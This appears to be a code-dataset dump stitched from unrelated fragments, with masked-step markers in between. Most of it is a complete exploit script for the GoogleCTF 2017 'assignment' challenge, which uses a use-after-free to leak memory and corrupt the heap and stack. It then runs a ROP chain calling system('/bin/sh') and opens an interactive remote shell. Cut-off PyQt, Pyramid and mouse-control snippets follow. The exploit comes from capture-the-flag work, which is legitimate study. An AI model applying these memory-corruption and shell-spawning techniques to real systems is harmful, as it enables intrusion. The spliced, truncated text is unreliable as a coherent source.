p64(bin_sh)\n payload += p64(system)\n validate(payload, [b'\\n'])\n evl(payload)\n evl('{}=42'.format(prop_name))\n payload = b'A' * offset_to_ret\n payload += p64(add_rsp_0x48)\n validate(payload, [b'\\n'])\n evl(payload)\n time.sleep(0.5)\n interact()\n\n\n<mask token>\n",
"step-5": "#!/usr/bin/env python3\n#\n# Exploit for \"assignment\" of GoogleCTF 2017\n#\n# CTF-quality exploit...\n#\n# Slightly simplified and shortened explanation:\n#\n# The bug is a UAF of one or both values during add_assign() if a GC is\n# triggered during allocate_value(). The exploit first abuses this to leak a\n# pointer into the heap by confusing an Integer Value with a Property. It then\n# abuses the UAF differently to create a fake String instance which is\n# concatenated and returned. By faking a String in the heap, we can read\n# arbitrary memory. We leak the addresses of libc and the stack. Next the\n# exploit does some heap feng shui, then fakes a string with length 0xffffffXX,\n# which triggers an integer overflow during string_concat(). This gives us a\n# heap-based buffer overflow. With that we first corrupt a Property to point\n# into the stack, then overwrite the length of the fake string with 0 to stop\n# the memcpy. We leak the address of the binary from the return address. Next\n# we write a value to the fake property. This writes a pointer to the heap into\n# the stack. With that we corrupt only the first byte of the input buffer\n# pointer so it now points further down into the stack. 
The next call to\n# readline() by the application then writes into the stack frame of readline()\n# and ultimately overwrites the return address => we get ROP:\n#\n# [+] Heap base @ 0x55cd3d465000\n# [+] libc @ 0x7f7ea1f79000\n# [+] stack @ 0x7ffcf044f448\n# [+] /bin/sh @ 0x7f7ea20f9103\n# [+] input_buf @ 0x7ffcf044f120\n# [+] return address @ 0x7ffcf044f118\n# [+] binary @ 0x55cd3c696000\n# [+] offset to return address: 0x18\n# [+] property name: j\n# id\n# uid=1337(user) gid=1337(user) groups=1337(user)\n# ls\n# assignment\n# flag.txt\n# cat flag.txt\n# CTF{d0nT_tHrOw_0u7_th1nG5_yoU_5ti11_u53}\n#\n# Author: Samuel <saelo> Groß\n#\n\nimport socket\nimport termios\nimport tty\nimport time\nimport sys\nimport select\nimport os\nimport re\nimport telnetlib\nimport string\nfrom struct import pack, unpack\nfrom binascii import hexlify, unhexlify\n\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n# Global Config\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n#TARGET = ('localhost', 4444)\nTARGET = ('assignment.ctfcompetition.com', 1337)\n\n# Enable \"wireshark\" mode, pretty prints all incoming and outgoing network traffic.\nNETDEBUG = False\n\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n# Encoding and Packing\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\ndef e(d):\n \"\"\"Encode the given string instance using UTF-8.\"\"\"\n return d.encode('UTF-8')\n\ndef d(d):\n \"\"\"Decode the given bytes instance using UTF-8.\"\"\"\n return d.decode('UTF-8')\n\ndef p32(d):\n \"\"\"Return d packed as 32-bit unsigned integer (little endian).\"\"\"\n return pack('<I', d)\n\ndef u32(d):\n \"\"\"Return the number represented by d when interpreted as a 32-bit unsigned integer (little endian).\"\"\"\n return unpack('<I', d)[0]\n\ndef p64(d):\n \"\"\"Return d packed as 64-bit unsigned integer (little endian).\"\"\"\n return pack('<Q', d)\n\ndef u64(d):\n \"\"\"Return the number represented by d when interpreted as a 64-bit unsigned integer (little endian).\"\"\"\n return unpack('<Q', d)[0]\n\n# 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n# Output\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\ndef print_good(msg):\n print(ansi(Term.BOLD) + '[+] ' + msg + ansi(Term.CLEAR))\n\ndef print_bad(msg):\n print(ansi(Term.COLOR_MAGENTA) + '[-] ' + msg + ansi(Term.CLEAR))\n\ndef print_info(msg):\n print('[*] ' + msg)\n\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n# Misc.\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\ndef bytes_and_strings_are_cool(func):\n \"\"\"Decorator to encode arguments that are string instances.\"\"\"\n def inner(*args, **kwargs):\n nargs = tuple(map(lambda arg: e(arg) if isinstance(arg, str) else arg, args))\n nkwargs = dict(map(lambda k, v: (k, e(v)) if isinstance(v, str) else (k, v), kwargs))\n return func(*nargs, **nkwargs)\n return inner\n\ndef validate(data, badchars):\n \"\"\"Assert that no badchar occurs in data.\"\"\"\n assert(all(b not in data for b in badchars))\n\ndef is_printable(b):\n \"\"\"Return true if the given byte is a printable ASCII character.\"\"\"\n return b in e(string.printable)\n\ndef hexdump(data):\n \"\"\"Return a hexdump of the given data. Similar to what `hexdump -C` produces.\"\"\"\n\n def is_hexdump_printable(b):\n return b in b' 0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz`~!@#$%^&*()-_=+[]{}\\\\|\\'\";:/?.,<>'\n\n lines = []\n chunks = (data[i*16:i*16+16] for i in range((len(data) + 15) // 16))\n\n for i, chunk in enumerate(chunks):\n hexblock = ['{:02x}'.format(b) for b in chunk]\n left, right = ' '.join(hexblock[:8]), ' '.join(hexblock[8:])\n asciiblock = ''.join(chr(b) if is_hexdump_printable(b) else '.' 
for b in chunk)\n lines.append('{:08x} {:23} {:23} |{}|'.format(i*16, left, right, asciiblock))\n\n return '\\n'.join(lines)\n\nclass Term:\n COLOR_BLACK = '30'\n COLOR_RED = '31'\n COLOR_GREEN = '32'\n COLOR_BROWN = '33'\n COLOR_BLUE = '34'\n COLOR_MAGENTA = '35'\n COLOR_CYAN = '36'\n COLOR_WHITE = '37'\n CLEAR = '0'\n\n UNDERLINE = '4'\n BOLD = '1'\n\n ESCAPE_START = '\\033['\n ESCAPE_END = 'm'\n\n# TODO rename to style and append Term.Clear ?\ndef ansi(*args):\n \"\"\"Construct an ANSI terminal escape code.\"\"\"\n code = Term.ESCAPE_START\n code += ';'.join(args)\n code += Term.ESCAPE_END\n return code\n\nclass DisconnectException(Exception):\n pass\n\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n# Pattern Generation\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\nclass Pattern:\n \"\"\"De-Bruijn sequence generator.\"\"\"\n alphabet = string.digits + string.ascii_letters\n\n def __init__(self, length):\n if length <= len(self.alphabet):\n self._seq = self.alphabet[:length]\n elif length <= len(self.alphabet) ** 2:\n self._seq = self._generate(2)[:length]\n elif length <= len(self.alphabet) ** 3:\n self._seq = self._generate(3)[:length]\n elif length <= len(self.alphabet) ** 4:\n self._seq = self._generate(4)[:length]\n else:\n raise Exception(\"Pattern length is way to large\")\n\n def _generate(self, n):\n \"\"\"Generate a De Bruijn sequence.\"\"\"\n # See https://en.wikipedia.org/wiki/De_Bruijn_sequence\n\n k = len(self.alphabet)\n a = [0] * k * n\n sequence = []\n\n def db(t, p):\n if t > n:\n if n % p == 0:\n sequence.extend(a[1:p + 1])\n else:\n a[t] = a[t - p]\n db(t + 1, p)\n for j in range(a[t - p] + 1, k):\n a[t] = j\n db(t + 1, t)\n db(1, 1)\n return ''.join(self.alphabet[i] for i in sequence)\n\n def bytes(self):\n \"\"\"Return this sequence as bytes.\"\"\"\n return e(self._seq)\n\n def __str__(self):\n \"\"\"Return this sequence as string.\"\"\"\n return self._seq\n\n @bytes_and_strings_are_cool\n def offset(self, needle):\n \"\"\"Returns the index of 'needle' in this 
sequence.\n\n 'needle' should be of type string or bytes. If an integer is provided\n it will be treated as 32-bit or 64-bit little endian number, depending\n on its bit length.\n \"\"\"\n if isinstance(needle, int):\n if needle.bit_length() <= 32:\n needle = p32(needle)\n else:\n needle = p64(needle)\n needle = d(needle)\n\n idx = self._seq.index(needle)\n if self._seq[idx+len(needle):].find(needle) != -1:\n raise ValueError(\"Multiple occurances found!\")\n\n return idx\n\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n# Network\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\nclass Channel:\n \"\"\"Convenience wrapper around a socket.\"\"\"\n OUTGOING_COLOR = Term.COLOR_RED\n INCOMING_COLOR = Term.COLOR_BLUE\n\n def __init__(self, sock, verbose):\n self._s = sock\n self._verbose = verbose\n self._buf = bytearray()\n\n def _prettyprint(self, data, outgoing):\n \"\"\"Prettyprint the given data.\n\n This does the following: All data that is valid ASCII is colorized according to the direction of the traffic.\n Everything else is converted to hex, then printed in bold and underline for visibility.\n\n Only ASCII is supported as of now. 
This might be the better choice anyway since otherwise valid UTF-8 might be\n detected in arbitrary binary streams.\n \"\"\"\n TEXT = 0\n BINARY = 1\n # Various Thresholds for the heuristics below\n X = 4\n Y = 16\n Z = 2\n\n\n color = self.OUTGOING_COLOR if outgoing else self.INCOMING_COLOR\n\n # Step 1: Tag every byte of the input stream with it's detected type.\n parts = []\n curr = ''\n for b in data:\n if is_printable(b):\n parts.append((TEXT, b))\n else:\n parts.append((BINARY, b))\n\n # Step 2: Merge neighboring bytes of the same type and convert the sequences to type bytes.\n i = 0\n mergedparts = []\n while i < len(parts):\n t = parts[i][0]\n arr = [parts[i][1]]\n j = i+1\n while j < len(parts) and parts[j][0] == t:\n arr.append(parts[j][1])\n j += 1\n i = j\n\n # Heuristic: If there are Y ASCII bytes with the same value followed by Z ASCII bytes followed by binary data, treat the Z bytes as binary as well.\n extra = []\n if t == TEXT and len(arr) > Y and i < len(parts) - 1:\n mid = len(arr) - Z - 1\n start, end = mid, mid\n char = arr[mid]\n while start >= 0 and arr[start] == char:\n start -= 1\n while end < len(arr) and arr[end] == char:\n end += 1\n\n # start and end point outside the range of equal-valued characters now.\n if end - start >= Y+2 and end < len(parts):\n extra = arr[end:]\n arr = arr[:end]\n\n mergedparts.append((t, bytes(arr)))\n if extra:\n mergedparts.append((BINARY, bytes(extra)))\n\n parts = mergedparts\n\n # Step 3: Merge all parts and prepend the ansi terminal escape sequences for the given type.\n buf = ''\n last = None\n for tag, value in parts:\n # Heuristic: If there is an ASCII sequence of X bytes or less surrounded by binary data, treat those as binary as well.\n if tag == TEXT and len(value) <= X and last == BINARY:\n tag = BINARY\n\n if tag == TEXT:\n buf += ansi(Term.CLEAR) + ansi(color)\n else:\n buf += ansi(color, Term.BOLD, Term.UNDERLINE)\n value = hexlify(value)\n\n buf += d(value)\n last = tag\n\n buf += 
ansi(Term.CLEAR)\n\n # Step 4: Print :)\n print(buf, end='')\n sys.stdout.flush()\n\n def setVerbose(self, verbose):\n \"\"\"Set verbosity of this channel.\"\"\"\n self._verbose = verbose\n\n def recv(self, n=4096):\n \"\"\"Return up to n bytes of data from the remote end.\n\n Buffers incoming data internally.\n\n NOTE: You probably shouldn't be using this method. Use one of the other recvX methods instead.\n \"\"\"\n if len(self._buf) < n:\n buf = self._s.recv(65536)\n if not buf and not self._buf:\n raise DisconnectException(\"Server disconnected.\")\n if self._verbose:\n self._prettyprint(buf, False)\n self._buf += buf\n\n # This code also works if n > len(self._buf)\n buf = self._buf[:n]\n self._buf = self._buf[n:]\n return buf\n\n def recvn(self, n):\n \"\"\"Return exactly n bytes of data from the remote end.\"\"\"\n data = []\n while len(data) != n:\n data.append(self.recv(1))\n\n return b''.join(data)\n\n @bytes_and_strings_are_cool\n def recvtil(self, delim):\n \"\"\"Read data from the remote end until delim is found in the data.\n\n The first occurance of delim is included in the returned buffer.\n \"\"\"\n buf = b''\n # TODO maybe not make this O(n**2)...\n while not delim in buf:\n buf += self.recv(1)\n return buf\n\n def recvregex(self, regex):\n \"\"\"Receive incoming data until it matches the given regex.\n\n Returns the match object.\n\n IMPORTANT: Since the data is coming from the network, it's usually\n a bad idea to use a regex such as 'addr: 0x([0-9a-f]+)' as this function\n will return as soon as 'addr: 0xf' is read. Instead, make sure to\n end the regex with a known sequence, e.g. 
use 'addr: 0x([0-9a-f]+)\\\\n'.\n \"\"\"\n if isinstance(regex, str):\n regex = re.compile(regex)\n buf = ''\n match = None\n\n while not match:\n buf += d(self.recv(1))\n match = regex.search(buf)\n\n return match\n\n def recvline(self):\n \"\"\"Receive and return a line from the remote end.\n\n The trailing newline character will be included in the returned buffer.\n \"\"\"\n return self.recvtil('\\n')\n\n def send(self, buf):\n \"\"\"Send all data in buf to the remote end.\"\"\"\n if self._verbose:\n self._prettyprint(buf, True)\n self._s.sendall(buf)\n\n def sendnum(self, n):\n \"\"\"Send the string representation of n followed by a newline character.\"\"\"\n self.sendline(str(n))\n\n @bytes_and_strings_are_cool\n def sendline(self, l):\n \"\"\"Prepend a newline to l and send everything to the remote end.\"\"\"\n self.send(l + b'\\n')\n\n def interact(self):\n \"\"\"Interact with the remote end: connect stdout and stdin to the socket.\"\"\"\n # TODO maybe use this at some point: https://docs.python.org/3/library/selectors.html\n self._verbose = False\n try:\n while True:\n available, _, _ = select.select([sys.stdin, self._s], [], [])\n for src in available:\n if src == sys.stdin:\n data = sys.stdin.buffer.read1(1024) # Only one read() call, otherwise this breaks when the tty is in raw mode\n self.send(data)\n else:\n data = self.recv(4096)\n sys.stdout.buffer.write(data)\n sys.stdout.flush()\n except KeyboardInterrupt:\n return\n except DisconnectException:\n print_info(\"Server disconnected.\")\n return\n\n#\n# Telnet emulation\n#\ndef telnet(shell='/bin/bash'):\n \"\"\"Telnet emulation.\n\n Opens a PTY on the remote end and connects the master side to the socket.\n Then spawns a shell connected to the slave end and puts the controlling TTY\n on the local machine into raw mode.\n Result: Something similar to a telnet/(plaintext)ssh session.\n\n Vim, htop, su, less, etc. will work with this.\n\n !!! 
This function only works if the channel is connected to a shell !!!\n \"\"\"\n assert(sys.stdin.isatty())\n c.setVerbose(False)\n\n # Open a PTY and spawn a bash connected to the slave end on the remote side\n code = 'import pty; pty.spawn([\\'{}\\', \\'-i\\'])'.format(shell)\n sendline('python -c \"{}\"; exit'.format(code))\n time.sleep(0.5) # No really good way of knowing when the shell has opened on the other side...\n # Should maybe put some more functionality into the inline python code instead.\n\n # Save current TTY settings\n old_settings = termios.tcgetattr(sys.stdin.fileno())\n\n # Put TTY into raw mode\n tty.setraw(sys.stdin)\n\n # Resize remote terminal\n # Nice-to-have: also handle terminal resize\n cols, rows = os.get_terminal_size(sys.stdin.fileno())\n sendline('stty rows {} cols {}; echo READY'.format(rows, cols))\n recvtil('READY\\r\\n') # terminal echo\n recvtil('READY\\r\\n') # command output\n\n interact()\n\n # Restore previous settings\n termios.tcsetattr(sys.stdin.fileno(), termios.TCSADRAIN, old_settings)\n\n#\n# Convenience wrappers that use the global socket instance\n#\ndef send(b):\n c.send(b)\n\ndef sendline(l):\n c.sendline(l)\n\ndef sendnum(n):\n c.sendnum(n)\n\ndef recv(n):\n return c.recv(n)\n\ndef recvtil(delim):\n return c.recvtil(delim)\n\ndef recvn(n):\n return c.recvn(n)\n\ndef recvline():\n return c.recvline()\n\ndef recvregex(r):\n return c.recvregex(r)\n\ndef interact():\n c.interact()\n\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n# Global Setup\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\ns = socket.create_connection(TARGET)\n#s.settimeout(2)\nc = Channel(s, NETDEBUG)\n\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n# Your code here\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\nALPHABET = 'abcdefghijklmnopqrstuvwxyz'\n\ndef evl(code):\n sendline(code)\n\ndef readvar(name):\n evl('=')\n recvtil('Bad token: 0-1\\n> ')\n evl(name)\n response = recvtil('> ')\n return response.split(b'\\n')[0]\n\ndef readintvar(name):\n return int(d(readvar(name)))\n\ndef 
readstrvar(name):\n return readvar(name)[1:-1]\n\ndef heapleak():\n \"\"\"Free the lhs and rhs values during add_assign. ...\"\"\"\n for i in range(16):\n evl('{}'.format(i))\n\n # Trigger heap info leak\n evl('h=0+0')\n return readintvar('h') & 0xfffffffffffff000\n\ndef gc(remaining):\n \"\"\"Trigger gargabe collection\"\"\"\n for i in range(remaining):\n evl('{}'.format(i))\n\ndef leak(addr, length):\n \"\"\"Leaks process memory by abusing the UAF to temporarily inject a fake string.\"\"\"\n fake_str_addr = heap_base + 0xb0\n fake_str = p64(length) + p64(addr)\n evl(b'l=\"' + fake_str + b'\"') # will be at offset 0xb0 from heap start\n\n for i in range(15):\n evl('{}'.format(i))\n # 19 slots filled\n\n # allocate 20th slot with integer value containing the addr of our fake string. The allocate_value() during do_add_assign triggers GC and frees the lhs value\n # Then the output value is allocated into the same slot. Since the output value is String (type of x),\n # lhs is turned into a string with controlled pointer\n evl('a={}+x'.format(fake_str_addr))\n gc(16)\n return readstrvar('a')[0:length]\n\n\ndef leak2(addr, length):\n \"\"\"Same as above, but different offsets...\"\"\"\n fake_str_addr = heap_base + 0x170\n fake_str = p64(length) + p64(addr)\n evl(b'l=\"' + fake_str + b'\"') # will be at offset 0xb0 from heap start\n\n for i in range(12):\n evl('{}'.format(i))\n\n evl('a={}+x'.format(fake_str_addr))\n return readstrvar('a')[0:length]\n\n\ndef pwn():\n global heap_base\n\n recvtil('>')\n\n evl('x=\"XXXXXXXXXXXXXXXX\"') # Workaround, need global object or else GC will crash\n # 2 slots always filled from now on (global object and int value 1337)\n\n heap_base = heapleak()\n # 3 slots always filled from now on\n\n print_good(\"Heap base @ 0x{:x}\".format(heap_base))\n\n # Create a smallbin chunk so we can leak a libc pointer\n evl('\"{}\"'.format('A' * 0x100))\n gc(20 - 4)\n\n\n # Leak freelist pointers pointing into the libc\n heap_mem = leak(heap_base, 
0x1000)\n for i in range(0, len(heap_mem)-16, 8):\n # Search for 2 consecutive pointers, those will be the flink and blink of the freed smallbin chunk\n flink = u64(heap_mem[i:i+8])\n blink = u64(heap_mem[i+8:i+16])\n if (abs(flink - heap_base) > 0x10000 and\n flink > 0x7f0000000000 and\n flink < 0x800000000000 and\n blink > 0x7f0000000000 and\n blink < 0x800000000000):\n break\n else:\n print_bad(\"No freelist pointers found :(\")\n return\n\n libc = flink - 0x3c1928\n print_good(\"libc @ 0x{:x}\".format(libc))\n\n\n # Leak stack pointer by reading environ pointer in libc\n env_ptr = u64(leak2(libc + 0x3c44a0, 8))\n print_good(\"stack @ 0x{:x}\".format(env_ptr))\n\n\n # Calculate addresses\n system = libc + 0x46590\n bin_sh = libc + 0x180103\n pop_rdi = libc + 0x22b9a\n pop_rsi = libc + 0x24885\n pop_rdx = libc + 0x1b8e\n add_rsp_0x48 = libc + 0xf5b8b\n\n print_good(\"/bin/sh @ 0x{:x}\".format(bin_sh))\n\n input_buf = env_ptr - 0x328\n print_good(\"input_buf @ 0x{:x}\".format(input_buf))\n ret_addr = env_ptr - 0x328 - 8\n print_good(\"return address @ 0x{:x}\".format(ret_addr))\n\n\n # 5 slots always filled from now\n\n #\n # Heap spray with Property instances to get a controlled heap layout again\n #\n # Make some objects\n evl('l.a=x')\n evl('h.a=x')\n evl('a.a=x')\n evl('b.a=x')\n evl('c.a=x')\n evl('d.a=x')\n evl('e.a=x')\n evl('f.a=x')\n\n # Trigger GC\n for i in range(9):\n evl('\"{}\"'.format('A' * 0x10))\n evl('1337')\n\n # 10 slots used\n\n # Allocate lots of properties (but no values)\n for o in ['l', 'a', 'h', 'a', 'b', 'c', 'd', 'e', 'f']:\n for p in ALPHABET:\n evl('{}.{}=x'.format(o, p))\n\n\n # Set up heap layout for unbounded heap overflow. We need the following layout:\n # | chunk to overflow from | ... | Property to corrupt | ... 
| Fake string |\n # We overflow into \"Fake string\" to set it's size to 0 and avoid a segfault.\n for i in range(6):\n evl('1337')\n\n # Create some properties\n for i in 'ghijk':\n evl('{}=x'.format(i))\n\n # Fake string with length 0xffffffXX => leads to an integer overflow during string_concat and subsequently a heap buffer overflow\n fake_str = p64(0xffffffffffffffff - 0xf - (0x180 - 0x10)) + p64(0x414141414141) + b'D'*0xf0\n evl(b'n=\"' + fake_str + b'\"')\n payload = b'\\x00' * 64 + p64(ord('p')) + p64(input_buf + 16 + 0x100) +p64(input_buf-7)\n payload += b'\\x00' * (0x180 - len(payload))\n evl(b'o=\"' + payload + b'\"')\n\n fake_str_addr = heap_base + 0x1e80\n # Trigger the overflow\n evl('p=o+{}'.format(fake_str_addr))\n\n\n # Set up a fake string property in the stack ('p' points to it). We need to leak the binary base from the return address\n payload = b'A' * 0x100\n payload += p64(1) + p64(input_buf + 16 + 0x100 + 0x18) + p64(0)\n payload += p64(8) + p64(ret_addr)\n evl(payload)\n\n binary = readstrvar('p')\n binary = u64(binary) - 2769\n print_good(\"binary @ 0x{:x}\".format(binary))\n\n offset_to_ret = ret_addr - (input_buf & 0xffffffffffffff00)\n print_good(\"offset to return address: 0x{:x}\".format(offset_to_ret))\n\n # Some unfortunate restrictions...\n if offset_to_ret > 0x28 or offset_to_ret < 0:\n print_bad(\"Bad offset\")\n return\n\n prop_name = p64(binary + 0xAC9)[1]\n if prop_name < ord('A') or prop_name > ord('z'):\n print_bad(\"Bad propery name: {}\".format(prop_name))\n return\n\n prop_name = chr(prop_name)\n print_good(\"property name: {}\".format(prop_name))\n\n # Write ROP chain into stack\n payload = b'A' * 56\n payload += p64(pop_rdi)\n payload += p64(bin_sh)\n payload += p64(system)\n validate(payload, [b'\\n'])\n evl(payload)\n\n # Trigger corruption of InputBuffer.ptr to point further down in the stack\n evl('{}=42'.format(prop_name))\n\n # Next input will be written into the stack frame of readline(). 
Overwrite the return address with \"add rsp, 0x48 ; ret\"\n payload = b'A'*offset_to_ret\n payload += p64(add_rsp_0x48)\n validate(payload, [b'\\n'])\n evl(payload)\n\n # Wait a short while and drop into interactive mode == shell\n time.sleep(0.5)\n\n interact()\n\nif __name__ == '__main__':\n pwn()\n",
"step-ids": [
30,
44,
58,
59,
63
]
}
|
[
30,
44,
58,
59,
63
] |
#!python
# -*- coding: utf-8 -*-
"""Application entry point: create the Qt application and show the main window."""
from PyQt4.QtCore import *
from PyQt4.QtGui import *
from window.window import *
import sys

# BUG FIX: `from PyQt4.QtGui import *` brings QApplication itself into this
# namespace, not a `QtGui` module object, so `QtGui.QApplication(...)` raised
# NameError. Call the imported class directly.
app = QApplication(sys.argv)
window = MainWindow()
window.show()
# exec_() runs the Qt event loop; its return code is propagated to the shell.
sys.exit(app.exec_())
|
normal
|
{
"blob_id": "9e2af13a15a98702981e9ee369c3a132f61eac86",
"index": 5174,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nwindow.show()\nsys.exit(app.exec_())\n",
"step-3": "<mask token>\napp = QtGui.QApplication(sys.argv)\nwindow = MainWindow()\nwindow.show()\nsys.exit(app.exec_())\n",
"step-4": "from PyQt4.QtCore import *\nfrom PyQt4.QtGui import *\nfrom window.window import *\nimport sys\napp = QtGui.QApplication(sys.argv)\nwindow = MainWindow()\nwindow.show()\nsys.exit(app.exec_())\n",
"step-5": "#!python\n# -*- coding: utf-8 -*-\n\nfrom PyQt4.QtCore import *\nfrom PyQt4.QtGui import *\n\nfrom window.window import *\nimport sys\n\n\napp = QtGui.QApplication(sys.argv)\nwindow = MainWindow()\nwindow.show()\nsys.exit(app.exec_())",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
from pyramid.request import Request
from pyramid.response import Response
from pyramid.view import view_config
from svc1_first_auto_service.data.repository import Repository
@view_config(route_name='autos_api', request_method='GET', renderer='json')
def all_autos(_):
    """Return a JSON list of up to 25 cars."""
    return Repository.all_cars(limit=25)
@view_config(route_name='auto_api', request_method='GET', renderer='json')
def single_auto(request: Request):
    """Look up a single car by the 'car_id' URL segment; 404 JSON error if unknown."""
    requested_id = request.matchdict.get('car_id')
    found = Repository.car_by_id(requested_id)
    if found:
        return found
    msg = "The car with id '{}' was not found.".format(requested_id)
    return Response(status=404, json_body={'error': msg})
@view_config(route_name='auto',
             request_method='GET',
             renderer='json')
def auto_by_id(request: Request):
    """Look up a single car by the integer 'cid' URL segment.

    Returns the car, or a 404 JSON error response when the segment is
    missing, is not a valid integer, or does not match any car.
    """
    cid = request.matchdict.get('cid')

    # BUG FIX: the original called int(cid) *before* the None check, so a
    # missing segment raised TypeError (HTTP 500) and the None branch was
    # unreachable dead code.
    if cid is None:
        msg = f"The cid is None"
        return Response(status=404, json_body={'error': msg})

    try:
        cid = int(cid)
    except ValueError:
        # Non-numeric segment: report not-found instead of crashing with 500.
        msg = f"The car with id '{cid}' was not found."
        return Response(status=404, json_body={'error': msg})

    car = Repository.car_by_cid(cid)
    if not car:
        msg = f"The car with id '{cid}' was not found."
        return Response(status=404, json_body={'error': msg})
    return car
|
normal
|
{
"blob_id": "cb903f3f7fd3c4f3ba5f8ff2ce12aac9c680aa15",
"index": 6116,
"step-1": "<mask token>\n\n\n@view_config(route_name='auto_api', request_method='GET', renderer='json')\ndef single_auto(request: Request):\n car_id = request.matchdict.get('car_id')\n car = Repository.car_by_id(car_id)\n if not car:\n msg = \"The car with id '{}' was not found.\".format(car_id)\n return Response(status=404, json_body={'error': msg})\n return car\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\n@view_config(route_name='autos_api', request_method='GET', renderer='json')\ndef all_autos(_):\n cars = Repository.all_cars(limit=25)\n return cars\n\n\n@view_config(route_name='auto_api', request_method='GET', renderer='json')\ndef single_auto(request: Request):\n car_id = request.matchdict.get('car_id')\n car = Repository.car_by_id(car_id)\n if not car:\n msg = \"The car with id '{}' was not found.\".format(car_id)\n return Response(status=404, json_body={'error': msg})\n return car\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\n@view_config(route_name='autos_api', request_method='GET', renderer='json')\ndef all_autos(_):\n cars = Repository.all_cars(limit=25)\n return cars\n\n\n@view_config(route_name='auto_api', request_method='GET', renderer='json')\ndef single_auto(request: Request):\n car_id = request.matchdict.get('car_id')\n car = Repository.car_by_id(car_id)\n if not car:\n msg = \"The car with id '{}' was not found.\".format(car_id)\n return Response(status=404, json_body={'error': msg})\n return car\n\n\n@view_config(route_name='auto', request_method='GET', renderer='json')\ndef auto_by_id(request: Request):\n cid = request.matchdict.get('cid')\n cid = int(cid)\n if cid is not None:\n car = Repository.car_by_cid(cid)\n if not car:\n msg = f\"The car with id '{cid}' was not found.\"\n return Response(status=404, json_body={'error': msg})\n return car\n else:\n msg = f'The cid is None'\n return Response(status=404, json_body={'error': msg})\n",
"step-4": "from pyramid.request import Request\nfrom pyramid.response import Response\nfrom pyramid.view import view_config\nfrom svc1_first_auto_service.data.repository import Repository\n\n\n@view_config(route_name='autos_api', request_method='GET', renderer='json')\ndef all_autos(_):\n cars = Repository.all_cars(limit=25)\n return cars\n\n\n@view_config(route_name='auto_api', request_method='GET', renderer='json')\ndef single_auto(request: Request):\n car_id = request.matchdict.get('car_id')\n car = Repository.car_by_id(car_id)\n if not car:\n msg = \"The car with id '{}' was not found.\".format(car_id)\n return Response(status=404, json_body={'error': msg})\n return car\n\n\n@view_config(route_name='auto', request_method='GET', renderer='json')\ndef auto_by_id(request: Request):\n cid = request.matchdict.get('cid')\n cid = int(cid)\n if cid is not None:\n car = Repository.car_by_cid(cid)\n if not car:\n msg = f\"The car with id '{cid}' was not found.\"\n return Response(status=404, json_body={'error': msg})\n return car\n else:\n msg = f'The cid is None'\n return Response(status=404, json_body={'error': msg})\n",
"step-5": "from pyramid.request import Request\nfrom pyramid.response import Response\nfrom pyramid.view import view_config\n\nfrom svc1_first_auto_service.data.repository import Repository\n\n\n@view_config(route_name='autos_api',\n request_method='GET',\n renderer='json')\ndef all_autos(_):\n cars = Repository.all_cars(limit=25)\n return cars\n\n\n@view_config(route_name='auto_api',\n request_method='GET',\n renderer='json')\ndef single_auto(request: Request):\n car_id = request.matchdict.get('car_id')\n\n car = Repository.car_by_id(car_id)\n if not car:\n msg = \"The car with id '{}' was not found.\".format(car_id)\n return Response(status=404, json_body={'error': msg})\n\n return car\n\n\n@view_config(route_name='auto',\n request_method='GET',\n renderer='json')\ndef auto_by_id(request: Request):\n cid = request.matchdict.get('cid')\n cid = int(cid)\n\n if cid is not None:\n car = Repository.car_by_cid(cid)\n if not car:\n msg = f\"The car with id '{cid}' was not found.\"\n return Response(status=404, json_body={'error': msg})\n\n return car\n else:\n msg = f\"The cid is None\"\n return Response(status=404, json_body={'error': msg})\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
<|reserved_special_token_0|>
class base_controller:
<|reserved_special_token_0|>
def move(self, xy: list):
"""
移动
"""
m.move(xy[0] * w, xy[1] * h)
def click(self, xy: list):
"""
点击
"""
m.click(xy[0] * w, xy[1] * h)
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def release(self, xy: list):
"""
松开
"""
m.release(xy[0] * w, xy[1] * h)
class mac_controller(base_controller):
def __init__(self):
super(mac_controller, self).__init__()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class base_controller:
<|reserved_special_token_0|>
def move(self, xy: list):
"""
移动
"""
m.move(xy[0] * w, xy[1] * h)
def click(self, xy: list):
"""
点击
"""
m.click(xy[0] * w, xy[1] * h)
def scroll(self, marks: list):
"""
滚动
"""
d = marks[0][1] - marks[-1][1]
R = 0.2
print(d)
if d > R:
m.scroll(-1)
elif d < -R:
m.scroll(1)
def press(self, xy: list, ones=True):
"""
长按
"""
if ones:
m.press(xy[0] * w, xy[1] * h)
else:
m.drag(xy[0] * w, xy[1] * h)
def release(self, xy: list):
"""
松开
"""
m.release(xy[0] * w, xy[1] * h)
class mac_controller(base_controller):
def __init__(self):
super(mac_controller, self).__init__()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
m = PyMouse()
w, h = m.screen_size()
class base_controller:
def __init__(self):
pass
def move(self, xy: list):
"""
移动
"""
m.move(xy[0] * w, xy[1] * h)
def click(self, xy: list):
"""
点击
"""
m.click(xy[0] * w, xy[1] * h)
def scroll(self, marks: list):
"""
滚动
"""
